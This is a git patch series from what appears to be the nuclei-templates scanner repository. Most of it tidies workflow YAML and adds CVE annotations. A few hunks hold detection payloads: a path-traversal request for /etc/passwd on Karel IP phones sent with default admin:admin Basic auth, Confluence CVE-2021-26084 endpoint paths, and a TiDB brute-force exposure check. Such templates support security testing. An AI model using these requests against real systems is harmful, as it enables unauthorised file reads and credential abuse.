technologies/jellyfin-detect.yaml diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 52dc245749..28c138f0b4 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -4,10 +4,8 @@ info: name: Jira Security Checks author: micha3lb3n description: A simple workflow that runs all Jira related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/jira-detect.yaml subtemplates: - tags: jira \ No newline at end of file diff --git a/workflows/liferay-workflow.yaml b/workflows/liferay-workflow.yaml index be0612de56..822022a83a 100644 --- a/workflows/liferay-workflow.yaml +++ b/workflows/liferay-workflow.yaml @@ -4,13 +4,8 @@ info: name: Liferay Security Checks author: dwisiswant0 description: A simple workflow that runs all liferay related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/liferay-portal-detect.yaml subtemplates: - template: cves/2020/CVE-2020-7961.yaml \ No newline at end of file diff --git a/workflows/lotus-domino-workflow.yaml b/workflows/lotus-domino-workflow.yaml index 58b07e209a..826d85b7a9 100644 --- a/workflows/lotus-domino-workflow.yaml +++ b/workflows/lotus-domino-workflow.yaml @@ -4,13 +4,8 @@ info: name: Lotus Domino Security Checks author: CasperGN description: A simple workflow that runs all Lotus Domino related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml matchers: - name: lotus-domino diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 3499322be0..1fff72dadc 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -4,7 +4,6 @@ info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk description: A simple workflow that runs all Lucee related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/lucee-detect.yaml diff --git a/workflows/magento-workflow.yaml b/workflows/magento-workflow.yaml index c7c30b1456..24e15e9433 100644 --- a/workflows/magento-workflow.yaml +++ b/workflows/magento-workflow.yaml @@ -4,7 +4,6 @@ info: name: Magento Security Checks author: TechbrunchFR description: A simple workflow that runs all Magento related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/magento-detect.yaml diff --git a/workflows/magmi-workflow.yaml b/workflows/magmi-workflow.yaml index 4e88637219..302bd59248 100644 --- a/workflows/magmi-workflow.yaml +++ b/workflows/magmi-workflow.yaml @@ -4,15 +4,9 @@ info: name: MAGMI Security Checks author: dwisiswant0 description: A simple workflow that runs all MAGMI related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/magmi-detect.yaml - subtemplates: - template: cves/2017/CVE-2017-7391.yaml - template: cves/2020/CVE-2020-5776.yaml diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml index bed58d312c..ab7579cd7a 100644 --- a/workflows/mida-eframework-workflow.yaml +++ b/workflows/mida-eframework-workflow.yaml @@ -4,13 +4,8 @@ info: name: Mida eFramework Security Checks author: CasperGN description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml matchers: - name: mida-eframework diff --git a/workflows/netsweeper-workflow.yaml b/workflows/netsweeper-workflow.yaml index a982fc1989..22405a1d70 100644 --- a/workflows/netsweeper-workflow.yaml +++ b/workflows/netsweeper-workflow.yaml @@ -4,14 +4,8 @@ info: name: Netsweeper Security Checks author: dwisiswant0 description: A simple workflow that runs all netsweeper related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/netsweeper-webadmin-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-13167.yaml \ No newline at end of file diff --git a/workflows/phpmyadmin-workflow.yaml b/workflows/phpmyadmin-workflow.yaml index 49f8d008d5..68ca23dc37 100644 --- a/workflows/phpmyadmin-workflow.yaml +++ b/workflows/phpmyadmin-workflow.yaml @@ -4,7 +4,6 @@ info: name: phpmyadmin-workflow author: philippedelteil description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target - tags: workflow workflows: - template: exposed-panels/phpmyadmin-panel.yaml diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index 9f4f182974..c5fc2b4324 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -4,13 +4,8 @@ info: name: RabbitMQ Security Checks author: fyoorer description: A simple workflow that runs all rabbitmq related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index 9c61e4830c..e94191bb2d 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -4,7 +4,6 @@ info: name: SAP NetWaver Security Checks author: dwisiswant0 description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/sap-netweaver-detect.yaml # HTTP Templates diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index 3dc656fc4b..8596d03e7b 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -4,10 +4,6 @@ info: name: SolarWinds Orion Security Checks author: dwisiswant0 description: A simple workflow that runs all SolarWinds Orion related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - template: exposed-panels/solarwinds-orion.yaml diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index acaad19e2b..86abcd4af0 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -4,13 +4,8 @@ info: name: Spring Boot Security Checks author: dwisiswant0 description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/springboot-actuator.yaml subtemplates: - tags: springboot diff --git a/workflows/thinkcmf-workflow.yaml b/workflows/thinkcmf-workflow.yaml index 13462302b0..106e8a23b2 100644 --- a/workflows/thinkcmf-workflow.yaml +++ b/workflows/thinkcmf-workflow.yaml @@ -3,10 +3,8 @@ info: name: ThinkCMF Security Checks author: pdteam description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/thinkcmf-detection.yaml subtemplates: - template: vulnerabilities/thinkcmf/ \ No newline at end of file diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml index 832c163af2..f71f3195e7 100644 --- a/workflows/thinkphp-workflow.yaml +++ b/workflows/thinkphp-workflow.yaml @@ -3,10 +3,8 @@ info: name: ThinkPHP Security Checks author: dr_set description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/tech-detect.yaml matchers: - name: thinkphp diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index ddf77dc573..872d1f23ae 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -4,15 +4,9 @@ info: name: vBulletin Security Checks author: pdteam description: A simple workflow that runs all vBulletin related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml - matchers: - name: vbulletin subtemplates: diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml index 5834b6ca3e..fcca4c6bd8 100755 --- a/workflows/weblogic-workflow.yaml +++ b/workflows/weblogic-workflow.yaml @@ -3,10 +3,8 @@ info: name: WebLogic Security Checks author: dr_set description: A simple workflow that runs all WebLogic related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/weblogic-detect.yaml subtemplates: diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index e7ce984db9..e9ebc836f1 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -3,7 +3,6 @@ info: name: Wordpress Security Checks author: kiblyn11,zomsop82 description: A simple workflow that runs all wordpress related nuclei templates on a given target. - tags: workflow workflows: From 1a69647ed1ff83bf049561daa213d5ec0b9154d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 17:35:30 -0300 Subject: [PATCH 124/339] Create confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 workflows/confluence-workflow.yaml diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml new file mode 100644 index 0000000000..23f3652e63 --- /dev/null +++ b/workflows/confluence-workflow.yaml @@ -0,0 +1,14 @@ +id: confluence-workflow + +info: + name: Atlassian's Confluence workflow + author: philippedelteil + description: Workflow that runs all Confluence related nuclei templates + tags: workflow + +workflows: + + - template: technologies/confluence-detect.yaml + subtemplates: + - tags: confluence + From bcc55f6a3fa4b4ab09dac94e64a2f43d33f20a2d Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 17:38:22 -0300 Subject: [PATCH 125/339] Update CVE-2021-26084.yaml Some targets worked without the ?SpaceKey=x --- cves/2021/CVE-2021-26084.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 1ef19a23c1..54134b92e1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -24,8 +24,11 @@ requests: payloads: path: - pages/createpage-entervariables.action?SpaceKey=x + - pages/createpage-entervariables.action - confluence/pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action - wiki/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action - pages/doenterpagevariables.action - pages/createpage.action?spaceKey=myproj - pages/templates2/viewpagetemplate.action From 5fe59db1ca986603cb5065d8ad032d15c6d3bec8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:17:34 +0530 Subject: [PATCH 126/339] Update confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index 23f3652e63..28f7500d4c 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -1,7 +1,7 @@ id: confluence-workflow info: - name: Atlassian's Confluence workflow + name: Atlassian Confluence workflow author: philippedelteil description: Workflow that runs all Confluence related nuclei templates tags: workflow @@ -11,4 +11,3 @@ workflows: - template: technologies/confluence-detect.yaml subtemplates: - tags: confluence - From 473bcb9c16c6b9d3574cd08b08db42767120c95f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:17:48 +0530 Subject: [PATCH 127/339] Update confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index 28f7500d4c..1830dfb187 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -3,7 +3,7 @@ id: confluence-workflow info: name: Atlassian Confluence workflow author: philippedelteil - description: Workflow that runs all Confluence related nuclei templates + description: Workflow that runs all Confluence related nuclei templates tags: workflow workflows: From 7491a628b158a96325c341aaee7517d62952f6ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:24:16 +0530 Subject: [PATCH 128/339] Update tomcat-detect.yaml --- technologies/tomcat-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index 5561dba63d..f78c945a3e 100644 --- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,7 +1,7 @@ -id: tomcat-version +id: tomcat-detect info: - name: Detect Tomcat Version + name: Tomcat Version Detect author: philippedelteil description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info @@ -28,4 +28,4 @@ requests: name: version group: 2 regex: - - '(

)(.*?)(

)' \ No newline at end of file + - '(

)(.*?)(

)' From 9661f57b97351469917480c691f857f828624c29 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:27:34 +0530 Subject: [PATCH 129/339] Update confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml index 1830dfb187..4636d6c85c 100644 --- a/workflows/confluence-workflow.yaml +++ b/workflows/confluence-workflow.yaml @@ -4,7 +4,6 @@ info: name: Atlassian Confluence workflow author: philippedelteil description: Workflow that runs all Confluence related nuclei templates - tags: workflow workflows: From 13ec24c2e321397a0d3e22392e4a99574fddb651 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:01:01 +0530 Subject: [PATCH 130/339] Update CVE-2018-15535.yaml --- cves/2018/CVE-2018-15535.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml index 5c53de530e..4c6646ce68 100644 --- a/cves/2018/CVE-2018-15535.yaml +++ b/cves/2018/CVE-2018-15535.yaml @@ -3,7 +3,7 @@ id: CVE-2018-15535 info: name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo - severity: high + severity: medium description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 From f01985b0a62c901d203df6f2fc89c676627cb5cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:06:54 +0530 Subject: [PATCH 131/339] Update karel-ip-phone-lfi.yaml --- karel-ip-phone-lfi.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml index d911d65f7e..8d8787781f 100644 --- a/karel-ip-phone-lfi.yaml +++ b/karel-ip-phone-lfi.yaml @@ -13,7 +13,8 @@ requests: - method: GET path: - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" - + headers: + Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: From 986510dfc3f0a3fa16c69d665e28fafc337a1a4c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:13:16 +0530 Subject: [PATCH 132/339] Update tidb-native-cred-bruteforce.yaml --- network/tidb-native-cred-bruteforce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-cred-bruteforce.yaml index 6344da325e..a72290581b 100644 --- a/network/tidb-native-cred-bruteforce.yaml +++ b/network/tidb-native-cred-bruteforce.yaml @@ -4,8 +4,8 @@ info: name: TiDB DB with enabled native password author: lu4nx severity: info - tags: network,tidb,bruteforce,database description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack. + tags: network,tidb,bruteforce,db network: - host: @@ -17,3 +17,4 @@ network: words: - "mysql_native_password" - "TiDB" + condition: and From 83bedfc6af0d8b7bd91b9f0c8b07043f1c7d4e15 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:14:04 +0530 Subject: [PATCH 133/339] Rename tidb-native-cred-bruteforce.yaml to tidb-native-password-bruteforce.yaml --- ...-cred-bruteforce.yaml => tidb-native-password-bruteforce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/{tidb-native-cred-bruteforce.yaml => tidb-native-password-bruteforce.yaml} (100%) diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-password-bruteforce.yaml similarity index 100% rename from network/tidb-native-cred-bruteforce.yaml rename to network/tidb-native-password-bruteforce.yaml From 1c829f9a0575481ee919c8306f653a165c695c63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:33:41 +0530 Subject: [PATCH 134/339] Update ibm-security-access-manager.yaml --- exposed-panels/ibm-security-access-manager.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm-security-access-manager.yaml index 91e521e81c..3d2e8aa816 100644 --- a/exposed-panels/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm-security-access-manager.yaml @@ -12,18 +12,17 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - type: word words: - "IBM Security Access Manager" - "<h2>IBM Security" - "<em>Access Manager" + part: body condition: and + - type: word part: header words: - - "text/html" + - "IBM Security Access Manager for Web" From e9f728c321699cc97abcf48a6dfb33e04b059d36 Mon Sep 17 00:00:00 2001 From: Ice3man543 <nizamulrana@gmail.com> Date: Fri, 10 Sep 2021 16:56:40 +0530 Subject: [PATCH 135/339] Added cve annotations + severity adjustments --- cves/2011/CVE-2011-4336.yaml | 5 +++++ cves/2012/CVE-2012-4242.yaml | 1 + cves/2013/CVE-2013-2287.yaml | 1 + cves/2013/CVE-2013-3526.yaml | 1 + cves/2014/CVE-2014-2323.yaml | 5 +++++ cves/2014/CVE-2014-3744.yaml | 5 +++++ cves/2014/CVE-2014-4210.yaml | 1 + cves/2014/CVE-2014-4535.yaml | 6 ++++++ cves/2014/CVE-2014-4536.yaml | 6 ++++++ cves/2014/CVE-2014-6271.yaml | 7 ++++++- cves/2014/CVE-2014-6308.yaml | 1 + cves/2014/CVE-2014-9094.yaml | 1 + cves/2015/CVE-2015-1000012.yaml | 6 ++++++ cves/2015/CVE-2015-2080.yaml | 7 ++++++- cves/2015/CVE-2015-2807.yaml | 1 + cves/2015/CVE-2015-6544.yaml | 5 +++++ cves/2015/CVE-2015-8349.yaml | 5 +++++ cves/2015/CVE-2015-8399.yaml | 5 +++++ cves/2015/CVE-2015-8813.yaml | 5 +++++ cves/2015/CVE-2015-9414.yaml | 6 ++++++ cves/2015/CVE-2015-9480.yaml | 6 ++++++ cves/2016/CVE-2016-0957.yaml | 4 ++++ cves/2016/CVE-2016-1000126.yaml | 6 ++++++ cves/2016/CVE-2016-1000127.yaml | 5 +++++ cves/2016/CVE-2016-1000128.yaml | 5 +++++ cves/2016/CVE-2016-1000129.yaml | 5 +++++ cves/2016/CVE-2016-1000130.yaml | 5 +++++ cves/2016/CVE-2016-1000131.yaml | 6 ++++++ cves/2016/CVE-2016-1000132.yaml | 5 +++++ cves/2016/CVE-2016-1000133.yaml | 5 +++++ cves/2016/CVE-2016-1000134.yaml | 5 +++++ cves/2016/CVE-2016-1000135.yaml | 5 +++++ cves/2016/CVE-2016-1000137.yaml | 6 ++++++ cves/2016/CVE-2016-1000138.yaml | 6 ++++++ cves/2016/CVE-2016-1000139.yaml | 6 ++++++ cves/2016/CVE-2016-1000140.yaml | 6 ++++++ cves/2016/CVE-2016-1000146.yaml | 6 ++++++ cves/2016/CVE-2016-1000148.yaml | 6 ++++++ cves/2016/CVE-2016-1000149.yaml | 6 ++++++ cves/2016/CVE-2016-1000152.yaml | 5 +++++ cves/2016/CVE-2016-1000153.yaml | 6 ++++++ cves/2016/CVE-2016-1000154.yaml | 5 +++++ cves/2016/CVE-2016-1000155.yaml | 6 ++++++ cves/2016/CVE-2016-10033.yaml | 7 ++++++- cves/2016/CVE-2016-10956.yaml | 5 +++++ cves/2016/CVE-2016-10960.yaml | 7 ++++++- cves/2016/CVE-2016-10993.yaml | 6 ++++++ cves/2016/CVE-2016-2004.yaml | 5 +++++ cves/2016/CVE-2016-2389.yaml | 5 +++++ cves/2016/CVE-2016-3081.yaml | 5 +++++ cves/2016/CVE-2016-5649.yaml | 5 +++++ cves/2016/CVE-2016-6277.yaml | 7 ++++++- cves/2016/CVE-2016-7552.yaml | 5 +++++ cves/2016/CVE-2016-7981.yaml | 5 +++++ cves/2017/CVE-2017-1000028.yaml | 5 +++++ cves/2017/CVE-2017-1000170.yaml | 5 +++++ cves/2017/CVE-2017-1000486.yaml | 5 +++++ cves/2017/CVE-2017-10075.yaml | 6 +++++- cves/2017/CVE-2017-10271.yaml | 4 ++++ cves/2017/CVE-2017-11444.yaml | 7 ++++++- cves/2017/CVE-2017-12149.yaml | 5 +++++ cves/2017/CVE-2017-12542.yaml | 4 ++++ cves/2017/CVE-2017-12611.yaml | 5 +++++ cves/2017/CVE-2017-12615.yaml | 7 ++++++- cves/2017/CVE-2017-12629.yaml | 6 ++++++ cves/2017/CVE-2017-12635.yaml | 7 ++++++- cves/2017/CVE-2017-12637.yaml | 5 +++++ cves/2017/CVE-2017-12794.yaml | 5 +++++ cves/2017/CVE-2017-14535.yaml | 6 ++++++ cves/2017/CVE-2017-14537.yaml | 5 +++++ cves/2017/CVE-2017-14651.yaml | 9 +++++++++ cves/2017/CVE-2017-14849.yaml | 9 +++++++++ cves/2017/CVE-2017-15647.yaml | 7 ++++++- cves/2017/CVE-2017-15715.yaml | 5 +++++ cves/2017/CVE-2017-15944.yaml | 6 +++++- cves/2017/CVE-2017-16806.yaml | 6 ++++++ cves/2017/CVE-2017-16877.yaml | 5 +++++ cves/2017/CVE-2017-17043.yaml | 5 +++++ cves/2017/CVE-2017-17059.yaml | 5 +++++ cves/2017/CVE-2017-17451.yaml | 5 +++++ cves/2017/CVE-2017-17562.yaml | 5 +++++ cves/2017/CVE-2017-18024.yaml | 5 +++++ cves/2017/CVE-2017-18536.yaml | 5 +++++ cves/2017/CVE-2017-18638.yaml | 5 +++++ cves/2017/CVE-2017-3506.yaml | 4 ++++ cves/2017/CVE-2017-3528.yaml | 8 +++++++- cves/2017/CVE-2017-3881.yaml | 5 +++++ cves/2017/CVE-2017-4011.yaml | 5 +++++ cves/2017/CVE-2017-5487.yaml | 7 ++++++- cves/2017/CVE-2017-5521.yaml | 7 ++++++- cves/2017/CVE-2017-5638.yaml | 5 +++++ cves/2017/CVE-2017-6090.yaml | 8 +++++++- cves/2017/CVE-2017-7269.yaml | 5 +++++ cves/2017/CVE-2017-7391.yaml | 5 +++++ cves/2017/CVE-2017-7615.yaml | 5 +++++ cves/2017/CVE-2017-7921.yaml | 7 ++++++- cves/2017/CVE-2017-8917.yaml | 7 ++++++- cves/2017/CVE-2017-9140.yaml | 5 +++++ cves/2017/CVE-2017-9288.yaml | 5 +++++ cves/2017/CVE-2017-9506.yaml | 7 ++++++- cves/2017/CVE-2017-9791.yaml | 5 +++++ cves/2017/CVE-2017-9805.yaml | 7 ++++++- cves/2017/CVE-2017-9822.yaml | 5 +++++ cves/2017/CVE-2017-9841.yaml | 7 ++++++- cves/2018/CVE-2018-0296.yaml | 8 +++++++- cves/2018/CVE-2018-1000129.yaml | 12 +++++++++++- cves/2018/CVE-2018-1000130.yaml | 8 ++++++++ cves/2018/CVE-2018-1000533.yaml | 5 +++++ cves/2018/CVE-2018-1000600.yaml | 7 ++++++- cves/2018/CVE-2018-1000861.yaml | 6 ++++++ cves/2018/CVE-2018-10095.yaml | 5 +++++ cves/2018/CVE-2018-10141.yaml | 5 +++++ cves/2018/CVE-2018-10822.yaml | 5 +++++ cves/2018/CVE-2018-11409.yaml | 6 ++++++ cves/2018/CVE-2018-11709.yaml | 5 +++++ cves/2018/CVE-2018-11759.yaml | 8 +++++++- cves/2018/CVE-2018-11776.yaml | 8 +++++++- cves/2018/CVE-2018-11784.yaml | 5 +++++ cves/2018/CVE-2018-12031.yaml | 7 ++++++- cves/2018/CVE-2018-1207.yaml | 5 +++++ cves/2018/CVE-2018-12095.yaml | 5 +++++ cves/2018/CVE-2018-1247.yaml | 13 ++++++++++++- cves/2018/CVE-2018-12613.yaml | 8 +++++++- cves/2018/CVE-2018-12634.yaml | 7 ++++++- cves/2018/CVE-2018-1271.yaml | 8 +++++++- cves/2018/CVE-2018-1273.yaml | 5 +++++ cves/2018/CVE-2018-1335.yaml | 7 ++++++- cves/2018/CVE-2018-13379.yaml | 11 ++++++++++- cves/2018/CVE-2018-13380.yaml | 5 +++++ cves/2018/CVE-2018-14013.yaml | 5 +++++ cves/2018/CVE-2018-14064.yaml | 7 ++++++- cves/2018/CVE-2018-14574.yaml | 15 ++++++++++++++- cves/2018/CVE-2018-14728.yaml | 11 ++++++++++- cves/2018/CVE-2018-15473.yaml | 7 ++++++- cves/2018/CVE-2018-15517.yaml | 7 ++++++- cves/2018/CVE-2018-15535.yaml | 7 ++++++- cves/2018/CVE-2018-15745.yaml | 5 +++++ cves/2018/CVE-2018-16059.yaml | 6 ++++++ cves/2018/CVE-2018-16167.yaml | 5 +++++ cves/2018/CVE-2018-16283.yaml | 6 ++++++ cves/2018/CVE-2018-16288.yaml | 5 +++++ cves/2018/CVE-2018-16299.yaml | 5 +++++ cves/2018/CVE-2018-16668.yaml | 5 +++++ cves/2018/CVE-2018-16670.yaml | 5 +++++ cves/2018/CVE-2018-16671.yaml | 5 +++++ cves/2018/CVE-2018-16763.yaml | 6 ++++++ cves/2018/CVE-2018-17246.yaml | 7 ++++++- cves/2018/CVE-2018-17254.yaml | 7 ++++++- cves/2018/CVE-2018-17431.yaml | 5 +++++ cves/2018/CVE-2018-18069.yaml | 7 +++++++ cves/2018/CVE-2018-18775.yaml | 5 +++++ cves/2018/CVE-2018-18777.yaml | 7 ++++++- cves/2018/CVE-2018-18778.yaml | 7 ++++++- cves/2018/CVE-2018-19386.yaml | 6 ++++++ cves/2018/CVE-2018-19439.yaml | 11 ++++++++++- cves/2018/CVE-2018-19458.yaml | 5 +++++ cves/2018/CVE-2018-20462.yaml | 5 +++++ cves/2018/CVE-2018-20470.yaml | 5 +++++ cves/2018/CVE-2018-20824.yaml | 7 +++++++ cves/2018/CVE-2018-20985.yaml | 7 ++++++- cves/2018/CVE-2018-2392.yaml | 5 +++++ cves/2018/CVE-2018-2628.yaml | 8 +++++++- cves/2018/CVE-2018-2791.yaml | 11 ++++++++++- cves/2018/CVE-2018-2893.yaml | 7 ++++++- cves/2018/CVE-2018-2894.yaml | 4 ++++ cves/2018/CVE-2018-3167.yaml | 10 +++++++++- cves/2018/CVE-2018-3714.yaml | 8 +++++++- cves/2018/CVE-2018-3760.yaml | 5 +++++ cves/2018/CVE-2018-3810.yaml | 6 ++++++ cves/2018/CVE-2018-5230.yaml | 8 ++++++++ cves/2018/CVE-2018-5233.yaml | 5 +++++ cves/2018/CVE-2018-5316.yaml | 5 +++++ cves/2018/CVE-2018-6008.yaml | 5 +++++ cves/2018/CVE-2018-6910.yaml | 5 +++++ cves/2018/CVE-2018-7251.yaml | 14 +++++++++++++- cves/2018/CVE-2018-7422.yaml | 5 +++++ cves/2018/CVE-2018-7490.yaml | 10 ++++++++++ cves/2018/CVE-2018-7600.yaml | 6 ++++++ cves/2018/CVE-2018-7700.yaml | 6 ++++++ cves/2018/CVE-2018-8006.yaml | 17 +++++++++++++++++ cves/2018/CVE-2018-8033.yaml | 7 +++++++ cves/2018/CVE-2018-8715.yaml | 5 +++++ cves/2018/CVE-2018-8719.yaml | 5 +++++ cves/2018/CVE-2018-8770.yaml | 5 +++++ cves/2018/CVE-2018-9118.yaml | 5 +++++ cves/2018/CVE-2018-9995.yaml | 6 +++++- cves/2019/CVE-2019-0193.yaml | 7 ++++++- cves/2019/CVE-2019-0221.yaml | 7 ++++++- cves/2019/CVE-2019-0230.yaml | 7 ++++++- cves/2019/CVE-2019-10068.yaml | 5 +++++ cves/2019/CVE-2019-10092.yaml | 5 +++++ cves/2019/CVE-2019-1010287.yaml | 8 +++++++- cves/2019/CVE-2019-10475.yaml | 10 ++++++++++ cves/2019/CVE-2019-11013.yaml | 8 +++++++- cves/2019/CVE-2019-11248.yaml | 7 ++++++- cves/2019/CVE-2019-11510.yaml | 8 +++++++- cves/2019/CVE-2019-11580.yaml | 4 ++++ cves/2019/CVE-2019-11581.yaml | 5 +++++ cves/2019/CVE-2019-11869.yaml | 5 +++++ cves/2019/CVE-2019-12276.yaml | 5 +++++ cves/2019/CVE-2019-12314.yaml | 7 ++++++- cves/2019/CVE-2019-12461.yaml | 5 +++++ cves/2019/CVE-2019-12593.yaml | 5 +++++ cves/2019/CVE-2019-12616.yaml | 5 +++++ cves/2019/CVE-2019-12725.yaml | 5 +++++ 